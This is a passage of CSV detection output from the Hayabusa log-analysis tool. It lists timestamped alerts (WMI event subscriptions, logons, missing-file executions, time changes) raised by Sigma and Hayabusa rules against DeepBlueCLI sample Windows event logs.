File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 
-2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not 
Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:43:44.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:44:02.385 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:59:43.385 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:17:38.760 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:21:25.557 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:27:57.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:38:14.682 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 
0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 
05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event 
